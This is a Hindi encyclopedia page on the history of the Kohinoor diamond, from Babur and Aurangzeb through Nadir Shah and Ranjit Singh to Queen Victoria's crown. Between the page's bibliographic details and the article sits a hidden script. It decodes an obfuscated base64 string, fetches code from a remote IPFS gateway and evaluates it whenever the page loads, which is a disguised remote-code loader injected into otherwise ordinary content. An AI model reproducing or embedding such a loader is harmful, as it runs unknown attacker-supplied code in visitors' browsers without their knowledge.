कोहेनूर

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
लेख सूचना
कोहेनूर
पुस्तक नाम हिन्दी विश्वकोश खण्ड 3
पृष्ठ संख्या 193
भाषा हिन्दी देवनागरी
संपादक सुधाकर पांडेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1976 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक भगवानदास वर्मा

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कोहेनूर भारत का सुविख्यात हीरा। 14वीं शताब्दी से पूर्व इस हीरे का इतिहास ठीक ज्ञात नहीं है। बाबर ने अपने संस्मरण में आगरे की विजय में एक बृहत्‌ उत्तम हीरा प्राप्त करने का उल्लेख किया है। संभवत: वह कोहेनूर ही था, क्योंकि उस हीरे का भार आठ मिस्कल (320 रत्ती) बताया है। तराशे जाने के पूर्व कोहेनूर का भार इतना ही था, निश्चित रूप से ज्ञात है कि कोहेनूर औरंगजेब के पास था और वह उसे बड़े यत्न से रखता था। 1739 ई. में जब नादिरशाह ने दिल्ली लूटी तब मुगल बादशाहों की बहुमूल्य वस्तुओं के साथ वह इसे भी ईरान ले गया। नादिरशाह की मृत्यु के पश्चात वह काबुल के अमीरों के पास रहा। कालवशात जब काबुल के तत्कालीन अमीर को पंजाब के महाराज रणजीत सिंह की शरण लेनी पड़ी तब 1813 ई. में वह हीरा उनके हाथ लगा। महाराज रणजीतसिंह के मरने पर 1849 ई. में ईस्ट इंडिया कंपनी ने पंजाब पर अधिकार किया और इस बहुमूल्य रत्न को महारानी विक्टोरिया को भेंट में दिया। विक्टोयाि ने इनकी सुंदरता बढ़ाने के लिये इसकी काटछाँट कराई, जिससे इसका भार केवल 106 कैरेट रह गया। यह अनुपम रत्न साम्राज्ञी के मुकुट में लगाया गया। आजकल यह ऐतिहासिक रत्न ब्रिटिश राज्य के अन्यान्य रत्नों के साथ लंदन के टावर नामक किले में सुरक्षित है। किंवदंती है कि कोहेनूर अशुभ रत्न है और अपने स्वामी पर इसका प्रभाव अनिष्टकारी होता है।


टीका टिप्पणी और संदर्भ